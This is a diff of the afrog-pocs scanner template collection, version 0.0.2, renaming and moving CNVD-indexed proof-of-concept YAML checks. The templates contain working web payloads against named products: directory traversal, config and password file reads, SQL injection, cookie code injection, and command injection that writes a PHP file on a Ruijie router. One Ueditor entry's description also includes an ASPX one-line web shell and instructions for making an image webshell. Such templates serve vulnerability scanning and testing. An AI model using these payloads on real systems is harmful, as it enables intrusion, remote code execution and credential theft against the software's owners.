afrog-pocs v0.0.2

Author: zan8in

afrog-pocs/unreviewed/resin-cnnvd-200705-315.yml afrog-pocs/CNVD/2007/CNVD-200705-315.yaml

@@ -1,18 +1,14 @@
-id: resin-cnnvd-200705-315
+id: CNNVD-200705-315
 
 info:
-    name: resin-cnnvd-200705-315
+    name: Caucho Resin Information Disclosure
     author: whynot(https://github.com/notwhy)
     severity: high
 
-manual: true
-transport: http
 rules:
     r0:
         request:
-            cache: true
             method: GET
             path: /%20../web-inf/
-            follow_redirects: false
         expression: response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /")
 expression: r0()

afrog-pocs/CNVD/2017/CNVD-2017-20077.yaml

@@ -0,0 +1,26 @@
+id: CNVD-2017-20077
+
+info:
+  name: Ueditor编辑器.net版本存在文件上传漏洞
+  author: zan8in 
+  severity: critical
+  description: |
+    <form action="http://8.8.8.8:8001/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
+    http://vps/11.jpg?.aspx 11.jpg是图片马；制作图片马：copy 1.jpg/b +2.aspx 3.aspx
+    aspx一句话：<%@ Page Language="Jscript"%><%eval(Request.Item["zan8in"],"unsafe");%>
+  reference:
+    - https://www.CNVD.org.cn/flaw/show/CNVD-2017-20077
+    - https://zhuanlan.zhihu.com/p/85265552
+    - https://www.freebuf.com/vuls/181814.html
+
+rules:
+  r0:
+    request:
+      method: GET
+      path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8
+      headers:
+        Accept-Encoding: 'deflate'
+      follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源")))
+expression: r0()

afrog-pocs/unreviewed/metinfo-lfi-cnvd-2018-13393.yml afrog-pocs/CNVD/2018/CNVD-2018-13393.yaml

@@ -1,16 +1,13 @@
-id: metinfo-lfi-cnvd-2018-13393
+id: CNVD-2018-13393
 
 info:
-    name: metinfo-lfi-cnvd-2018-13393
+    name: Metinfo file read
     author: JingLing(https://hackfun.org/)
     severity: high
 
-manual: true
-transport: http
 rules:
     r0:
         request:
-            cache: true
             method: GET
             path: /include/thumb.php?dir=http\..\admin\login\login_check.php
             follow_redirects: true

afrog-pocs/unreviewed/xiuno-bbs-cvnd-2019-01348-reinstallation.yml afrog-pocs/CNVD/2019/CNVD-2019-01348.yaml

@@ -1,21 +1,17 @@
-id: xiuno-bbs-cvnd-2019-01348-reinstallation
+id: CNVD-2019-01348
 
 info:
-    name: xiuno-bbs-cvnd-2019-01348-reinstallation
+    name: Xiuno BBS CNVD-2019-01348
     author: 清风明月(www.secbook.info)
     severity: high
 
-manual: true
-transport: http
 rules:
     r0:
         request:
-            cache: true
             method: GET
             path: /install/
             headers:
                 Accept-Encoding: deflate
-            follow_redirects: false
         expression: response.status == 200 && response.body.bcontains(bytes(string("/view/js/xiuno.js"))) && response.body.bcontains(bytes(string("Choose Language (选择语言)")))
 expression: r0()
 

afrog-pocs/unreviewed/coremail-cnvd-2019-16798.yml afrog-pocs/CNVD/2019/CNVD-2019-16798.yaml

@@ -1,12 +1,10 @@
-id: coremail-cnvd-2019-16798
+id: CNVD-2019-16798
 
 info:
-    name: coremail-cnvd-2019-16798
+    name: Coremail Information Disclosure
     author: cc_ci(https://github.com/cc8ci)
     severity: high
 
-manual: true
-transport: http
 rules:
     r0:
         request:

afrog-pocs/unreviewed/discuz-ml3x-cnvd-2019-22239.yml afrog-pocs/CNVD/2019/CNVD-2019-22239.yaml

@@ -1,32 +1,26 @@
-id: discuz-ml3x-cnvd-2019-22239
+id: CNVD-2019-22239
 
 info:
-    name: discuz-ml3x-cnvd-2019-22239
+    name: Discuz!ML 3.x 任意代码执行
     author: X.Yang
-    severity: high
+    severity: critical
 
-manual: true
-transport: http
 set:
     r1: randomInt(800000000, 1000000000)
 rules:
     r0:
         request:
-            cache: true
             method: GET
             path: /forum.php
-            follow_redirects: false
         expression: response.status == 200
         output:
             search: '"cookiepre = ''(?P<token>[\\w_]+)''".bsubmatch(response.body)'
             token: search["token"]
     r1:
         request:
-            cache: true
             method: GET
             path: /forum.php
             headers:
                 Cookie: '{{token}}language=sc''.print(md5({{r1}})).'''
-            follow_redirects: false
         expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
 expression: r0() && r1()

afrog-pocs/unreviewed/joomla-cnvd-2019-34135-rce.yml afrog-pocs/CNVD/2019/CNVD-2019-34135.yaml

@@ -1,19 +1,16 @@
-id: joomla-cnvd-2019-34135-rce
+id: CNVD-2019-34135
 
 info:
-    name: joomla-cnvd-2019-34135-rce
+    name: Joomla configuration.php RCE
     author: X.Yang
     severity: high
 
-manual: true
-transport: http
 set:
     r1: randomLowercase(10)
     r2: randomLowercase(10)
 rules:
     r0:
         request:
-            cache: true
             method: GET
             path: /
             headers:
@@ -25,7 +22,6 @@ rules:
             token: search["token"]
     r1:
         request:
-            cache: true
             method: POST
             path: /
             headers:

afrog-pocs/unreviewed/xunchi-cnvd-2020-23735-file-read.yml afrog-pocs/CNVD/2020/CNVD-2020-23735.yaml

@@ -1,21 +1,17 @@
-id: xunchi-cnvd-2020-23735-file-read
+id: CNVD-2020-23735
 
 info:
-    name: xunchi-cnvd-2020-23735-file-read
+    name: Xxunchi Local File read
     author: 清风明月(www.secbook.info)
     severity: high
 
-manual: true
-transport: http
 rules:
     r0:
         request:
-            cache: true
             method: GET
             path: /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
             headers:
                 Accept-Encoding: deflate
-            follow_redirects: false
         expression: response.status == 200 && response.body.bcontains(bytes(string("NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"))) && response.body.bcontains(bytes(string("display_errors")))
 expression: r0()
 

afrog-pocs/unreviewed/e-zkeco-cnvd-2020-57264-read-file.yml afrog-pocs/CNVD/2020/CNVD-2020-57264.yaml

@@ -1,16 +1,13 @@
-id: e-zkeco-cnvd-2020-57264-read-file
+id: CNVD-2020-57264
 
 info:
-    name: e-zkeco-cnvd-2020-57264-read-file
+    name: e-zkeco-CNVD-2020-57264-read-file
     author: ThestaRY (https://github.com/ThestaRY7/)
     severity: high
 
-manual: true
-transport: http
 rules:
     r0:
         request:
-            cache: true
             method: GET
             path: /iclock/ccccc/windows/win.ini
         expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")

afrog-pocs/unreviewed/ecshop-cnvd-2020-58823-sqli.yml afrog-pocs/CNVD/2020/CNVD-2020-58823.yaml

@@ -1,18 +1,15 @@
-id: ecshop-cnvd-2020-58823-sqli
+id: CNVD-2020-58823
 
 info:
-    name: ecshop-cnvd-2020-58823-sqli
+    name: ecshop-CNVD-2020-58823-sqli
     author: 凉风(http://webkiller.cn/)
     severity: high
 
-manual: true
-transport: http
 set:
     r1: randomInt(40000, 44800)
 rules:
     r0:
         request:
-            cache: true
             method: POST
             path: /delete_cart_goods.php
             body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))

afrog-pocs/cnvd/2020/seeyon-cnvd-2020-62422-readfile.yml afrog-pocs/CNVD/2020/CNVD-2020-62422.yaml

@@ -1,21 +1,16 @@
 id: CNVD-2020-62422
 
 info:
-  name: seeyon-cnvd-2020-62422-readfile
+  name: 致远oa系统存在任意文件读取漏洞
   author: Aquilao(https://github.com/Aquilao)
   severity: medium
   reference:
-    - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422
-  tags: seeyon,cnvd
+    - https://www.CNVD.org.cn/flaw/show/CNVD-2020-62422
 
-manual: true
-transport: http
 rules:
     r0:
         request:
-            cache: true
             method: GET
             path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
-            follow_redirects: false
         expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
 expression: r0()

afrog-pocs/unreviewed/h5s-video-platform-cnvd-2020-67113-unauth.yml afrog-pocs/CNVD/2020/CNVD-2020-67113.yaml

@@ -1,22 +1,18 @@
-id: h5s-video-platform-cnvd-2020-67113-unauth
+id: CNVD-2020-67113
 
 info:
-    name: h5s-video-platform-cnvd-2020-67113-unauth
+    name: H5S CONSOLE 存在未授权访问
     author: iak3ec(https://github.com/nu0l)
     severity: high
 
-manual: true
-transport: http
 rules:
   h5s1:
     request:
-      cache: true
       method: GET
       path: /api/v1/GetSrc
     expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_AUTO") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd")
   h5s2:
     request:
-      cache: true
       method: GET
       path: /api/v1/GetDevice
     expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_DEV") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd")

afrog-pocs/login/default-pwd/datang-ac-default-password-cnvd-2021-04128.yml afrog-pocs/CNVD/2021/CNVD-2021-04128.yaml

@@ -1,20 +1,16 @@
-id: datang-ac-default-password-cnvd-2021-04128
+id: CNVD-2021-04128
 
 info:
-    name: datang-ac-default-password-cnvd-2021-04128
+    name: Datang AC Default Password
     author: B1anda0(https://github.com/B1anda0)
     severity: high
 
-manual: true
-transport: http
 rules:
     r0:
         request:
-            cache: true
             method: POST
             path: /login.cgi
             body: user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
-            follow_redirects: false
         expression: response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
 expression: r0()
 

afrog-pocs/cnvd/2021/cnvd-2021-09650.yml afrog-pocs/CNVD/2021/CNVD-2021-09650.yaml

@@ -1,16 +1,13 @@
-id: cnvd-2021-09650
+id: CNVD-2021-09650
 
 info:
-    name: ruijie-eweb-rce-cnvd-2021-09650
+    name: 锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞
     author: White(https://github.com/WhiteHSBG)
     severity: high
-    tags: huijietong,lfi
     reference:
         - https://xz.aliyun.com/t/9016?page=1
         - https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/
 
-manual: true
-transport: http
 set:
     r1: randomLowercase(4)
     r2: randomLowercase(4)
@@ -20,15 +17,13 @@ set:
 rules:
     r0:
         request:
-            cache: true
             method: POST
             path: /guest_auth/guestIsUp.php
             body: |
                 ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00
         expression: response.status == 200 && !response.body.bcontains(b'"success":false')
     r1:
         request:
-            cache: true
             method: GET
             path: /guest_auth/{{r2}}.php
         expression: response.status == 200 && response.body.bcontains(bytes(r1)) && !response.body.bcontains(b'"success":false')

afrog-pocs/unreviewed/eea-info-leak-cnvd-2021-10543.yml afrog-pocs/CNVD/2021/CNVD-2021-10543.yaml

@@ -1,16 +1,13 @@
-id: eea-info-leak-cnvd-2021-10543
+id: CNVD-2021-10543
 
 info:
-    name: eea-info-leak-cnvd-2021-10543
+    name: EEA Information Disclosure
     author: Search?=Null
     severity: high
 
-manual: true
-transport: http
 rules:
     r0:
         request:
-            cache: true
             method: GET
             path: /authenticationserverservlet
         expression: response.status == 200 && "<username>(.*?)</username>".bmatches(response.body) && "<password>(.*?)</password>".bmatches(response.body)

afrog-pocs/cnvd/2021/ruijie-uac-cnvd-2021-14536.yml afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml

@@ -1,18 +1,14 @@
-id: ruijie-uac-cnvd-2021-14536
+id: CNVD-2021-14536
 
 info:
-    name: ruijie-uac-cnvd-2021-14536
+    name: 锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞
     author: jweny(https://github.com/jweny)
     severity: high
 
-manual: true
-transport: http
 rules:
     r0:
         request:
-            cache: true
             method: GET
             path: /login.php
-            follow_redirects: false
         expression: response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
 expression: r0()